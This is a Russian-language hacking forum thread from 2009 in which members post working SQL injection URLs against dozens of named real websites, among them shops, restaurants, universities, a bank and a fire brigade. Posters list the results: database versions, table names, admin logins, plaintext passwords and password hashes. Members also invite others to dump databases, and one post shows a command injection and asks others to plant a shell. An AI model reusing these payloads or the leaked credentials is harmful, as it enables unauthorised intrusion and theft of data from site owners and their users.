Суши-бар
PR0
http://www.mizusushibar.com/news_detail.php?id=-24+union+select+1,concat_ws(0x3a,user(),version(), database(),table_schema,table_name,column_name),3, 4,5,6+from+information_schema.columns+where+table_ schema=database()--
mizusuh8_mikesuh@localhost:5.0.67-community-log:mizusuh8_mizu
satana8920
10.04.2009, 22:06
http://pool.veoo.de/bilder/show.php?id=2'+union+select+1--
Database Version: 5.0.32-Debian_7etch8
Database name: DB14850
User name: DB14850@localhost
http://www.psychoambulanz.de/forum_free/show.php?forum=500&id=-230+1,2,3,4,5,6,7,8--
Database Version: 4.0.27-log
Database name: DB30543
User name: www.psychoambulanz.de@bruce.store
http://www.fra35.de/fotoalbum/show.php?id=-822+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--
Database Version: 5.0.51a-3ubuntu5.4
Database name: fra35db
User name: fra35dbuser@localhost
http://www.absolutemusic.co.uk/shop/index.php?cat_id=497+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20--
Database Version: 4.1.22-standard
Database name: absolute_
User name: absolute@localhost
http://www.berryscrumptious.co.uk/shop/index.php?cat=1+union+select+1--
Database Version: 5.0.67-community
Database name: berryscr_shop
User name: berryscr_shop@localhost
PS чуть чуть Немцы и Англичане :)
mailbrush
10.04.2009, 23:20
http://www.henleystandardtoday.co.uk/food/food.php?id=1+union+select+1,2,3,4,5,6,concat_ws(0 x3a,user(),database(),version()),8,9,10
hsta@localhost:henleystanda:5.0.45
<<Все о кино>>
http://films.h16.ru/main.php?ttt=-15+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21/*
db: 4.0.27
name_db: films6
user: films6@89.108.68.85
os :portbld-freebsd6.4
mailbrush
11.04.2009, 00:10
http://www.russonsrestaurant.co.uk/food.php?&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4russons@192.168.0.17:russons:4.1.22-log
http://www.electure.kiev.ua/VLibraryElement.php?sec_name=2+UNION+SELECT+AES_DE CRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User()),0x71),0x71)+LIMIT+1,1--
4.0.23a/**/electure/**/electure@nuke.univ.kiev.ua
mailbrush
11.04.2009, 11:12
A SIPT прикольная штука =)
http://www.killarney.ie/food.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20
Database Version: 5.0.45-community-log
Database name: splashg_konline
User name: splashg_konline@web3.hosting365.ie
Tables:
Database [splashg_konline]
Table [anouncements]
Table [attractions]
Table [bandb]
Table [boat]
Table [calendar_list]
Table [camping]
Table [club]
Table [club_subcat]
Table [coach_tour]
Table [comm_news]
Table [council_news]
Table [council_pdf]
Table [council_services]
Table [dining]
Table [fishing]
Table [gallery]
Table [gallery_cat]
Table [gateway]
Table [golfing]
Table [guesthouse]
Table [homepagecms]
Table [horse]
Table [hostel]
Table [hotels]
Table [jcars]
Table [mail_list]
Table [news_list]
Table [non_members]
Table [offers]
Table [other]
Table [other_accom]
Table [other_subcat]
Table [publication]
Table [publications]
Table [radio_news]
Table [school]
Table [search]
Table [self_catering]
Table [shop]
Table [shop_subcat]
Table [sights]
Table [ssp_account]
Table [ssp_albums]
Table [ssp_dynamic]
Table [ssp_dynamic_links]
Table [ssp_images]
Table [ssp_slideshows]
Table [ssp_usrs]
Table [subpagecms]
Table [tourist]
Table [tours]
Table [twin_town]
Table [walking]
satana8920
11.04.2009, 11:32
http://www.klima-ueberraschung.de/show.php?id=14+1,2,3,4,5,6--
Database Version: 4.0.27-standard-log
Database name: db223113601
User name: dbo223113601@212.227.109.137
http://www.klima-ueberraschung.de/admin/ админка кто найдет какие нито таблицы отпишитесь плизз
яяя зер ГУТ :)))
mailbrush оо еще какая прикольная :)
mailbrush
11.04.2009, 11:49
http://www.country-tours.com/food.php?ID_CAT=10&ID_SUBCAT=0&ID=24+union+select+1,2,3,4,5,6,7,8
Database Version: 5.0.67
Database name: 202_country-tours
User name: 202_cn@localhost
Tables:
Database [202_country-tours]
Table [ACC]
Table [ADMIN]
Table [AUTO_SERVICE]
Table [CATEGORIA_CUSTOMIZED]
Table [CATEGORIA_FOOD]
Table [CATEGORIA_GUESTBOOK]
Table [CATEGORIA_TOUR]
Table [CONTENUTI_ACC_ENG]
Table [CONTENUTI_ACC_ITA]
Table [CONTENUTI_CUSTOMIZED_ENG]
Table [CONTENUTI_CUSTOMIZED_ITA]
Table [CONTENUTI_FOOD_ENG]
Table [CONTENUTI_FOOD_ITA]
Table [CONTENUTI_NEWS_ENG]
Table [CONTENUTI_NEWS_ITA]
Table [CONTENUTI_TOUR_ENG]
Table [CONTENUTI_TOUR_ITA]
Table [CUSTOMIZED]
Table [CUSTOM_TOUR]
Table [FOOD]
Table [FOTO_CONTENUTI_ACC_ENG]
Table [FOTO_CONTENUTI_ACC_ITA]
Table [FOTO_CONTENUTI_CUSTOMIZED_ENG]
Table [FOTO_CONTENUTI_CUSTOMIZED_ITA]
Table [FOTO_CONTENUTI_FOOD_ENG]
Table [FOTO_CONTENUTI_FOOD_ITA]
Table [FOTO_CONTENUTI_NEWS_ENG]
Table [FOTO_CONTENUTI_NEWS_ITA]
Table [FOTO_CONTENUTI_TOUR_ENG]
Table [FOTO_CONTENUTI_TOUR_ITA]
Table [GUESTBOOK_ENG]
Table [GUESTBOOK_ITA]
Table [LINKS]
Table [LUOGHI_SERVICE]
Table [NEWS]
Table [PHOTOGALLERY]
Table [PHOTO_PHOTOGALLERY]
Table [REGIONI]
Table [SOTTOCATEGORIA_FOOD]
Table [SOTTOCATEGORIA_TOUR]
Table [TOUR]
Table [TRATTA_SERVICE]
<<Рестораны мексиканская кухня>>
http://spb-tour.com/ViewRestaurant.php?Id=-14'+union+select+1,2,3,4,table_name,6,7+from+infor mation_schema.columns+where+column_name+like+'pass word'+limit+1,1--+
db: 5.0.45
name_db: galina_spbt
user: galina_spbt@localhost
os: unknown-freebsd6.2
---------------------------------
http://spb-tour.com/robots.txt
User-Agent:
Disallow: /1/
Disallow: /admin/
Disallow: /html/
Disallow: /Forum.php
---------------------------------
http://spb-tour.com/admin
админка с бейсик авторизацией :(
table: users
db: galina_spbt
log: eva
pass: eva
+limit+х,х--+
mailbrush
11.04.2009, 13:45
http://www.brianandmichelle.com/food.php?op=show&id=-4+union+select+1,2,3,4,5
Database Version: 5.0.37-log
Database name: michelle
User name: michelle@localhost
<<"АТН" Агенство Телевидения Новости>>
http://atn.kharkov.ua/gallery_view.php?idf=-17+union+select+1,2,unhex(hex(concat_ws(0x3a,usern ame,user_password))),4,5,6,7,8+from+atn.forum_user s+limit+1,1--+
db: 5.0.45-log
name_db: site
user: atn@localhost
os: portbld-freebsd5.4
-----------
table: admin
kol-vo: 5
log :jne
pass:jne21
email :jne@rs.com.ua
acess : 223
+limit+х,х--+
---------
table: forum_users
db: atn
log :ideatryFriema
pass :2b7c0e2fb517f2b9e3e53e0b03537c8b :(
+limit+х,х--+
---------------------------------------
---------------------------------------
<<"Гостинный комплекс "Пушкарская свобода">>
http://www.sloboda-gk.ru/news.php?id=-79+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8--+
db: 4.1.22-log
name_db: wwwslobodagkru
user: slobodag@localhost
os: portbld-freebsd6.2
www.eureca.org
http://www.eureca.org/catalog/product.php?id=-17+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15,16,17, 18
Версия - 4.1.22
Юзер - eureca1@localhost
БД - eureca1
Табличка юзеры
http://www.eureca.org/catalog/product.php?id=-17+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,logi n,pass,mail),8,9,10,11,12,13,14,15,16,17,18+from+u sers
P.S. выводятся сразу все юзеры
Вход в юзеры http://www.eureca.org/users/login
www.childcare.ie
http://www.childcare.ie/brochers.php?id=70&cmbCounty=32%09UNION%09SELECT%091,2,AES_DECRYPT(AE S_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0 x2F2A2A2F,User()),0x71),0x71),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35--
Database Version: 5.0.45-log
Database name: jamesla_childcare
User name: jamesla_wlor@web16.hosting365.ie
mailbrush
11.04.2009, 16:57
http://www.veganstockholm.se/lang_eng/eat.php?mode=seeOne&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18Database Version: 5.0.67
Database name: u0501141_a
User name: u0501141@www19.aname.net
<<"Модельное агенство Ренессанс Москва">>
http://www.renessans.ru/news_full.php?id=-508+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),8,9,0, 1,2,3,4,5,6,7,8--+
db: 5.0.22
name_db: renes
users: renes@localhost
os: redhat-linux-gnu
table: users
type: A
log: admin
pass: $1$WE$fFPL1qCgvP8kQ5xlKUW3R/
name: EW
users
+limit+х,х--+
------------------------------
------------------------------
<<Международня выставка"ПИР">>
http://www.pir.ru/news_menu.php?ld=2&id=-6988+union+select+table_name+from+information_sche ma.columns+where+column_name+like+'password'
db: 5.1.26-rc
name_db: pir
user: pir@localhost
os: portbld-freebsd7.0
-=admin=-
log: odmin
pass: 1qazxsw2
mailbrush
11.04.2009, 17:39
http://www.thefalesteam.com/sell.php?ID=35+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1 1,12
Database Version: 4.1.15
Database name: fales
User name: fales_web@localhost
mailbrush
11.04.2009, 18:07
http://www.tvog.ru/novinki.php?id=34+UNION+SELECT+1,2,3,4,5,6,7,8
Database Version: 4.1.25
Database name: tvog
User name: tvog@localhost
www.puckfair.ie
http://www.puckfair.ie/viewnews.php?id=151+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x 2F2A2A2F,User()),0x71),0x71),3,4,5--
5.0.45-community-log/**/splashg_puck/**/splashg_puck@web3.hosting365.ie
admin:$P$9RhCyg93wapcdaH7omGeUhIYb5gctX/
<<Ресторанные заметки>>
http://www.resto.kharkov.ua/user.php?id=-1028+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os)--+
db :5.0.51a-15-log
name_db: restox
user: u_restox@localhost
os: debian-linux-gnu
<<ИнформоЭКСПО - Информационное выставочное агенство>>
http://www.informexpo.ru/new/view_content.php?id=-1612'+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),6--+
db: 5.0.77-Max-log
name_db: udachax7_main
user: udachax7_main@c4-w.ht-systems.ru
os: unknown-linux-gnu
http://ghosty.ru
http://ghosty.ru/meet.php?mid=17+UNION+SELECT+1,2,3,CONCAT(0x787371 6C696E6A626567696E,Version(),0x2F2A2A2F,Database() ,0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6+LIM IT+1,1--
Database Version: 4.1.22
Database name: ghosty_smart
User name: ghosty_smart@212.193.238.136
mailbrush
11.04.2009, 23:04
http://www.kalker-freiheit.net/nachrichten.php?ID=-935+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*
Database Version: 5.0.32-Debian_7etch8
Database name: muelheim
User name: wwwmuelheim@dedi1304.your-server.de
Tables:
Database [muelheim]
Table [Kunden]
Table [LinkKat]
Table [LinkListe]
Table [Links]
Table [Nachrichten]
Table [NachrichtenLinks]
Table [Ressourcen]
Table [Stadtteile]
Table [TerminInteressenGruppen]
Table [TerminLinks]
Table [Termine]
Table [Testtabelle]
Table [Veranstalter]
Table [VeranstalterAnsprechpartner]
Table [VeranstaltungsOrte]
Table [VeranstaltungsOrteSozial]
Table [Werbepartner]
Table [ZuordnungLink_Nachricht]
Table [ZuordnungLink_Stadtteil]
Table [ZuordnungNachricht_Historie]
Table [ZuordnungNachricht_Kategorie]
Table [ZuordnungNachricht_Kunde]
Table [ZuordnungNachrichten_Stadtteil]
Table [ZuordnungTermin_InteressenGruppen]
Table [ZuordnungTermin_Kategorie]
Table [ZuordnungTermin_Kunde]
Table [ZuordnungTermin_Stadtteil]
Table [ilinks]
Table [mUser]
Table [qub3_queries_que]
Table [qub3_relations_rel]
Table [qub3_settings_set]
Table [sky_newsletter_bann]
Table [sky_newsletter_log]
Table [sky_newsletter_main]
Table [sky_newsletter_settings]
Table [sky_newsletter_user]
Table [src_cache_cah]
Table [src_temp_tmp]
Table [tempAktuelles]
<<Агенство путешествий "Лазурь">>
http://www.laurel-travel.ru/country_tour.php?id=-44'+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8--+&country_id=34
db :5.0.22
name_db :wwwlaureltravelr
user :laureltr@localhost
os :redhat-linux-gnu - 4
-=phpbb_users=-
http://www.laurel-travel.ru/country_tour.php?id=-44'+union+select+1,2,concat_ws(0x3a,username,%20us er_password),4,5,6,7,8+from+phpbb_users+limit+1,1--+&country_id=34
.:[melkiy]:.
12.04.2009, 01:43
http://www.abma.ag/news.php?id=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 4.1.22-max-log
Database name: abma
User name: abma@68.178.254.202
Login: people
Pass: r1d1cul0us
Админка:
http://www.abma.ag/admin
www.vjpsych.ie
http://www.vjpsych.ie/index.php?p=my_vjpsych_sub2&id=57&topic_id=84+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_E NCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F 2A2A2F,User()),0x71),0x71),6,7,8,9+LIMIT+1,1--
Database Version: 4.1.11-standard
Database name: vjpsych_dbase
User name: vjpsych@localhost
mailbrush
12.04.2009, 10:32
Через этот сайт есть доступ еще к нескольким:
http://www.flu.de/nachrichten.php?id=-6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Database Version: 5.0.32-Debian_7etch8-log
Database name: flu
User name: Stl_prioR08@standleitungen1.laxin.de
mysql
user : pass : file_priv
root:*1C903C503D579946C23249F14E07F7C193F98298:Y
debian-sys-maint:*623A3AC39E85E7A6EF73568F10798862B010A411:Y
confixx:*1C903C503D579946C23249F14E07F7C193F98298: N
Stl_prioR08:*F900F6B1E9630A2364799C3251A9EC4B96C46 5EC:N
Все таблицы/базы на сервере, кроме information_schema & mysql.
Database [abwahl]
Table [abwahl_parteien]
Table [abwahl_personen]
Table [abwahl_personenverzeichnis]
Table [abwahl_pol_stimmung]
Database [confixx]
Table [admin]
Table [alerts]
Table [allgemein]
Table [anbieter]
Table [angebote]
Table [atdomains]
Table [autoresponder]
Table [backup]
Table [bdefault]
Table [billing_del]
Table [billing_exp]
Table [bin]
Table [bmysql]
Table [config]
Table [cronjobs]
Table [cssl]
Table [custom_skins]
Table [delaccs]
Table [dns]
Table [domainlog]
Table [domains]
Table [email]
Table [email_forward]
Table [ereignisse]
Table [events]
Table [fehlermeldungen]
Table [frontpage]
Table [frontpagealias]
Table [ftp]
Table [grep]
Table [htaccess]
Table [httpd_definitions]
Table [httpd_entries]
Table [httpd_permissions]
Table [httpd_states]
Table [idn_aliases]
Table [ipadressen]
Table [iprestriction]
Table [kunden]
Table [logout]
Table [maillist]
Table [menublock]
Table [menuitem]
Table [mysql_datenbanken]
Table [nladressen]
Table [nlinhalt]
Table [perl]
Table [personalinfo]
Table [pop3]
Table [pwdreminder]
Table [pwschutz]
Table [register]
Table [restore]
Table [server]
Table [sessions]
Table [skins]
Table [spampref]
Table [traffic]
Table [transfer]
Table [types]
Table [updates]
Table [users]
Table [webalizer]
Table [webapp]
Table [webapp2confixx]
Table [webapp_knowledge]
Table [webapp_param]
Table [webapp_requir]
Table [webapp_user]
Table [webapp_user_param]
Table [webmail_ab]
Table [webmail_def_from]
Table [webmail_session]
Table [webmail_sign]
Table [zeiten]
Database [flu]
Table [airlines]
Table [airports]
Table [bilder]
Table [comments]
Table [imglisttrack]
Table [nachrichten]
Table [news_anbieter]
Table [news_entry]
Table [news_kategorien]
Table [news_language]
Table [news_quelle]
Table [news_users]
Table [votings]
Database [usr_web126_1]
Table [faqadminlog]
Table [faqadminsessions]
Table [faqchanges]
Table [faqcomments]
Table [faqdata]
Table [faqfragen]
Table [faqnews]
Table [faqrights]
Table [faqrubrik]
Table [faqsessions]
Table [faqstatistik]
Table [faquser]
Table [faqvisits]
Table [faqvoting]
Table [internetfaqadminlog]
Table [internetfaqadminsessions]
Table [internetfaqchanges]
Table [internetfaqcomments]
Table [internetfaqdata]
Table [internetfaqfragen]
Table [internetfaqnews]
Table [internetfaqrights]
Table [internetfaqrubrik]
Table [internetfaqsessions]
Table [internetfaqstatistik]
Table [internetfaquser]
Table [internetfaqvisits]
Table [internetfaqvoting]
Database [usr_web126_2]
Table [anfragen]
Table [angebote]
Table [auftrag_annahme]
Table [auslandsstand]
Table [bandbreiten]
Table [betreuung]
Table [blankoformular_sprachen]
Table [branchenloesungen]
Table [counter]
Table [dark_laendernamen]
Table [forum]
Table [infos_bonusprovision]
Table [kunden]
Table [leitungen_international]
Table [lexikon_statistik]
Table [mitarbeiter_aktuell]
Table [nachrichten]
Table [orte]
Table [partner]
Table [partner_analogxxl]
Table [passwort]
Table [plz_de]
Table [produktdatenbank]
Table [rubriken]
Table [shop]
Table [statistik]
Table [telefon_alice_citys]
Table [tk_vorschlaege]
Table [tkfach]
Table [turkflat_de_anfrage]
Table [vertriebspartner_voranmeldung]
Table [vorwahlen]
Table [zaehler]
Database [usr_web126_3]
Table [dark_anbietenphp_sprachen]
Table [dark_atm_kunden]
Table [dark_center_sprachen]
Table [dark_framerelay_kunden]
Table [dark_glasfaser_kunden]
Table [dark_glfangebot_sprachen]
Table [dark_kabel_angebote]
Table [dark_kontakt_sprachen]
Table [dark_laendernamen]
Table [dark_landstandard_sprachen]
Table [dark_menu_sprachen]
Table [dark_metatags_sprachen]
Table [dark_mpls_kunden]
Table [dark_newsletter_sprachen]
Table [dark_newsletterkunden]
Table [dark_passwort]
Table [dark_satellit_kunden]
Table [dark_sonstige_anfragen]
Table [dark_sprachenleiste_sprachen]
Table [dark_standleitungen_kunden]
Table [dark_start_sprachen]
Table [dark_suchenphp_sprachen]
Table [leitungen_international]
Table [leitungen_international2]
Database [usr_web126_4]
Table [besuchervon]
Table [carrier]
Table [carrier_standort]
Table [dsl_auftraege_zuordnung]
Table [http_referer_stat]
Table [news_pv]
Table [partnerdomains]
Table [partnervertrieb]
Table [plz_ew]
Table [plz_vw]
Table [potentielle_auftraege]
Table [telefonanschluss_preisuebersicht]
Table [telekom_auftraege]
Table [tkw_csv_versendet]
Table [vertragsunterlagen_de_besuchervon]
Database [usr_web126_5]
Table [anbieter]
Table [links]
Table [metatags]
Table [produkte]
Table [searchs]
Database [usr_web126_6]
Table [anbieter]
Table [kategorien]
Table [language]
Table [nachrichten]
Table [quelle]
Table [users]
http://www.cierrenet.it/sing.php?tipo=libro&id=-3976+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14--
version():user():database()
5.0.45:cierredb@localhost:libri
PR: 5
cmsms_adminlog
http://www.cierrenet.it/admin/login.php
<<Stelladimare>>
http://www.stelladimare.ru/index.php?option=com_news&Itemid=58&task=view&id=-120+union+select+-1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8--+
db: 4.1.22
name_db: stelladi_joom0
user: stelladi_cms18@212.193.230.207
os: portbld-freebsd6.2
-
robots.txt
-
User-agent: Yandex
Disallow: /*?_openstat
Disallow: /*?option=com_cruiseinfo&Itemid=53
Disallow: /templates/stella_di_mare/css/
Disallow: /AC_RunActiveContent.js
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
Host: www.stelladimare.ru
User-agent: Googlebot
Disallow: /*?_openstat
Disallow: /*?option=com_cruiseinfo&Itemid=53
Disallow: /templates/stella_di_mare/css/
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
Disallow: /AC_RunActiveContent.js
User-agent: *
Disallow: /templates/stella_di_mare/css/
Disallow: /AC_RunActiveContent.js
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation
-----------------------
-----------------------
<<Компания "Теремок">>
http://www.teremok.ru/forum.phtml?act=read&msg=4316+and+1=15+union+select+1,concat_ws(0x3a,ve rsion(),database(),user(),@@version_compile_os),3, 4,5,6,7,8,9,0,1,2,3,4,5--+
db: 5.0.67-log
name_db: u20648
user :u20648@10.10.223.211
os :unknown-freebsd6.2
table: Admin_users
log: padmin
pas: 5bfee75778f81085
-=users=-
limit+Х,Х--+
hellworm
12.04.2009, 14:16
Нашёл инъекцию , только я совсем новичок и раскрутить не получилось :confused:
http://www.praktik-um.ru/arenda.php?base=1'+union+select+1,2,version(),3,4, 5,6,7--
http://chernenko.org.ua/blog.php?id=-144+union+select+concat_ws(0x3a,version(),database (),user(),@@version_compile_os),2--+
db: 5.0.51a-24-log
name_db: einstein_db1
user: einstein@selena
os: debian-linux-gnu
Интересно!
вывод скули происходит в флэш плеере)) через конкат не идёт так что подстааавляем что надо)
http://www.sherland.ie/admin/flash/mp3player.php?outlet=17&music_nr=-12+union+select+version()--
<<Обои для рабочего стола>>
http://artoboi.com/foto.php?id=-7794+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8--+
db: 5.1.22-rc
name_db: artoboi
user: artoboi@localhost
os: portbld-freebsd7.0
dbuser:deone_site@v48.valuehost.ru
database: deone_site
table: pages
rows:
id text
SQL-in: http://www.alternation.ru/index.php?action=page&page=8+union+select+null,null,null,null,null+from+ pages/*
<<Молодежный интернет портал, республики коми "Штурвал">>
http://www.shturval.net/arhive.php?ID=-25+union+select+1,2,3,@@version_compile_os--+
db: 5.0.
db_name: _1 a160
user: 94 _1 a160
os: nu t- redh
Библиотека компании Oracle (pr7)
http://library.thinkquest.org/C001341/resources/openrev.php3?mn=c&pn=r&id=4+order+by+12/*&page=1&
дальше со скулью не смог, но нашел интересную штуку:
http://library.thinkquest.org/C0110189/cgi-bin/Load.cgi?Page=|ls -la|
можно гулять по всему серву, если кому-нибудь удастся залить шелл или еще лучше порутать, отпишите в ЛС плз, как вы это сделали ;)
кста, хорошие маны по пхп на сайте, с примерами..
cremator (c)
12.04.2009, 19:48
http://www.turkey.turmaster.ru/mountain_skiing/palandoken/hotels/show/?hid=1200+UNION+SELECT+1,2,3,4,5,unhex(hex(concat( user(),0x3a,version(),0x3a,database()))),7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56+LIMIT+1,1
PR4 тИЦ120
studentsuccess.asu.edu - главный домен пр9
http://studentsuccess.asu.edu/rsvp/viewrsvp.php?id=9'+union+select+1,2,3,version(),5, 6,7,8,9,10,11,12,13,14,15,16%23
brown.edu - пр9
http://www.brown.edu/Research/Choices/resources/detail.php?id=-192+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28/*
msm.cam.ac.uk - пр7
http://www.msm.cam.ac.uk/doitpoms/miclib/phase_diagrams.php?id=-8+union+select+version(),2--
cnr.vt.edu - пр7
http://www.cnr.vt.edu/dendro/dendrology/syllabus/factsheet.cfm?ID=-194+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67+from+%22list%20of%20species%20in%20the%20 program%22
satana8920
12.04.2009, 20:07
http://www.stadt-trebbin.de/show.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16--
Database Version: 4.0.27-standard-log
Database name: db99989045
User name: dbo99989045@212.227.127.17
http://www.feuerwehr-hamburg.de/aktuelles/show.php?id=-1191+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.1.25-log
Database name: ffhh
User name: ffhh@gnom5-mail.kommunity.net
http://www.monheim.de/freizeit/vereine/show.php?id=-293+union+select+concat(version(),0x3a,database(), 0x3a,user(),0x3a,@@version_compile_os),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17--
Database Version: 5.0.32-Debian_7etch8
Database name: sucheaz
User name: sucheaz@localhost
http://www.mindroses.de/autoren/show.php?id=-17+UNION+SELECT+1,,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33--
Database Version: 5.0.26
Database name: mindroses
User name: mindroses@localhost
http://www.inec.de/show.php?id=-193+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.32-Debian_7etch8
Database name: inec
User name: inec@localhost
http://www.aw-autographen.de/script/show.php?page=5&id=-018+union+select+1,2,3,4,5,6--
Database Version: 5.0.32-Debian_7etch8
Database name: db_autographen
User name: autographen@localhost
http://www.das-matratzen-haus.de/shop2/show.php?rb=397'+union+select+1,2,3,4/*
Database Version: 4.0.25-Max-log
Database name: v132849
User name: v132849@localhost
кто сдампит прошу в ЛС за плюсами ;)
http://www.modelle-amberg-regensburg.de/show.php?id=-285+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 4.0.27-max
Database name: db92260001
User name: db92260001@localhost
Lutherion
12.04.2009, 21:35
Это просто ППЦ )))) куда нафег столько много? аж 415 оО
http://www.bagshop.com/store/mcart.php?ID=-5664'+U NION+SELECT+1,2,concat_ws(0x203a20,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100, 101,102,103,104,105,106,107,108,109,110,111,112,11 3,114,115,116,117,118,119,120,121,122,123,124,125, 126,127,128,129,130,131,132,133,134,135,136,137,13 8,139,140,141,142,143,144,145,146,147,148,149,150, 151,152,153,154,155,156,157,158,159,160,161,162,16 3,164,165,166,167,168,169,170,171,172,173,174,175, 176,177,178,179,180,181,182,183,184,185,186,187,18 8,189,190,191,192,193,194,195,196,197,198,199,200, 201,202,203,204,205,206,207,208,209,210,211,212,21 3,214,215,216,217,218,219,220,221,222,223,224,225, 226,227,228,229,230,231,232,233,234,235,236,237,23 8,239,240,241,242,243,244,245,246,247,248,249,250, 251,252,253,254,255,256,257,258,259,260,261,262,26 3,264,265,266,267,268,269,270,271,272,273,274,275, 276,277,278,279,280,281,282,283,284,285,286,287,28 8,289,290,291,292,293,294,295,296,297,298,299,300, 301,302,303,304,305,306,307,308,309,310,311,312,31 3,314,315,316,317,318,319,320,321,322,323,324,325, 326,327,328,329,330,331,332,333,334,335,336,337,33 8,339,340,341,342,343,344,345,346,347,348,349,350, 351,352,353,354,355,356,357,358,359,360,361,362,36 3,364,365,366,367,368,369,370,371,372,373,374,375, 376,377,378,379,380,381,382,383,384,385,386,387,38 8,389,390,391,392,393,394,395,396,397,398,399,400, 401,402,403,404,405,406,407,408,409,410,411,412,41 3,414,415+--+
5.0.45-log : fiftyone_r@localhost : fiftyone_store
www.domesticsupplies.co.uk
http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5
Версия - 5.0.45
Юзер - verbiercms@server213-171-218-146.livedns.org.uk
БД - verbierholidays
http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,username,password), 2,3,4,5+from+vme_cms_users
admin:528d29f4efd0516f1bf06f2082725af4
http://www.jordan-altmark.de/themen.sed.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7/*
Database Version: 4.1.22-max-log
Database name: d003b735
User name: d003b735@localhost
www.camdennational.com
http://www.camdennational.com/personal/savings/product.php?ID=17+union+select+1,2,concat_ws(0x3a3 a,version(),user(),database()),4,5,6,7,8,9,10,11
Версия - 5.0.45
Юзер - pemaquid_nystr0m@localhost
БД - pemaquid_3lmstr33t
ЮЗЕРЫ
http://www.camdennational.com/personal/savings/product.php?ID=17+union+select+1,2,concat_ws(0x3a3 a,user,pass),4,5,6,7,8,9,10,11+from+tbl_people
P.S. переберием юзеров через лимит
www.uniontrust.com
Основан на той же базе (таблички все те же)
www.unp-russia.ru
http://www.unp-russia.ru/product.php?id=-17+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12
Версия - 4.1.22-log
Юзер - unprussi@fe20.hc.ru
БД - unprussia
ЮЗЕРЫ
http://www.unp-russia.ru/product.php?id=-17+union+select+1,concat_ws(0x3a3a,login,password) ,3,4,5,6,7,8,9,10,11,12+from+users+limit+0,1
Перебираем юзеров через лимит
AkyHa_MaTaTa
